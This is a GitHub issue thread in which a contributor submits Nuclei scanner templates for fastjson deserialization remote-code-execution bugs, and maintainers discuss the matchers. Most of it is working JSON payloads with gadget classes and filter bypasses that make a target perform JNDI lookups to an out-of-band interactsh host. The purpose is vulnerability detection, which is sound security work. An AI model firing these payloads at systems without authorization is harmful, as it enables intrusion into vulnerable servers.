### ISSUE TITLE
fastjsonRce

### ISSUE THREAD

**Issue by zhihuba** [projectdiscovery/nuclei-templates#2865]
**Template Details**

**
It will be much easier if the fuzz supports parsing "interactsh-url"**

```yaml
id: fastjson-1224

info:
  name: fastjson-1224
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{{interactsh-url}}/exploit\",\"autoCommit\":true}}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1224-bypass

info:
  name: fastjson-1.2.24
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{{interactsh-url}}/Exploit\",\"autoCommit\":true}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1241

info:
  name: fastjson-1.2.41
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{{interactsh-url}}/Exploit\",\"autoCommit\":true}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1242

info:
  name: fastjson-1.2.42
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"LL\\u0063\\u006f\\u006d.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"rmi://{{interactsh-url}}/Exploit\",\"autoCommit\":true}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1243

info:
  name: fastjson-1.2.43
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{{interactsh-url}}/Exploit\",\"autoCommit\":true}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1247

info:
  name: fastjson-1.2.47
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"name\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"x\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://{{interactsh-url}}/Exploit\",\"autoCommit\":true}}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1262

info:
  name: fastjson-1.2.62
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://{{interactsh-url}}/exploit\"}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1267

info:
  name: fastjson-1.2.67
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"rmi://{{interactsh-url}}/Exploit\"}}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1268

info:
  name: fastjson-1.2.68
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\": \"rmi://{{interactsh-url}}/Exploit\"}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1268-01

info:
  name: fastjson-1.2.68
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\": \"rmi:/{{interactsh-url}}/Exploit\"}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
```yaml
id: fastjson-1268-02

info:
  name: fastjson-1.2.68
  author: zh
  severity: high
  tags: rce,fastjson

requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\",\"jndiNames\": \"rmi://{{interactsh-url}}/Exploit\"}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```

**Comment by ehsandeep** [comment]
Thanks a lot for sharing the collection of fastjson RCEs @zhihuba.

> It will be much easier if the fuzz supports parsing "interactsh-url"**

Could you please elaborate on this? is any feature is missing or something else?

**Comment by geeknik** [comment]
Might also make sense to change the DNS matcher to HTTP as you can’t really prove exploitation with a DNS lookup alone. 👍🏻

**Comment by ehsandeep** [comment]
> Might also make sense to change the DNS matcher to HTTP as you can’t really prove exploitation with a DNS lookup alone. 👍🏻

HTTP is not an option in this case as HTTP request is not initiated, will add few more other unique matchers.

**Comment by ehsandeep** [comment]
@zhihuba do you have any reference to these pocs? I've found two of them [vulhub](https://github.com/vulhub/vulhub/tree/master/fastjson/) here to validate and add more matchers.

**Comment by zhihuba** [comment]
> 将 DNS 匹配器更改为 HTTP 可能也有意义，因为单凭 DNS 查找并不能真正证明其剥削。👍🏻

The dns effect will be better. When the target only allows dns to go out of the network. You will not miss it. You can try other methods for command execution.

**Comment by zhihuba** [comment]
> Might also make sense to change the DNS matcher to HTTP as you can’t really prove exploitation with a DNS lookup alone. 👍🏻

The dns effect will be better. When the target only allows dns to go out of the network. You will not miss it. You can try other methods for command execution.

**Comment by zhihuba** [comment]
> @zhihuba do you have any reference to these pocs? I've found two of them [vulhub](https://github.com/vulhub/vulhub/tree/master/fastjson/) here to validate and add more matchers.
Yes, you can use it to verify.

If the template is like this

**When sending the request, the interactsh-url will not be replaced with the corresponding connection**
```yaml
requests:
  - method: POST
    path:
      - '{{BaseURL}}'
    body: "{{rceBody}}"

    payloads:
      rceBody:
        - "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\",\"jndiNames\": \"rmi://{{interactsh-url}}/Exploit\"}"
        - "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"rmi://{{interactsh-url}}/Exploit\"}}"
        - "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://{{interactsh-url}}/exploit\"}"
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
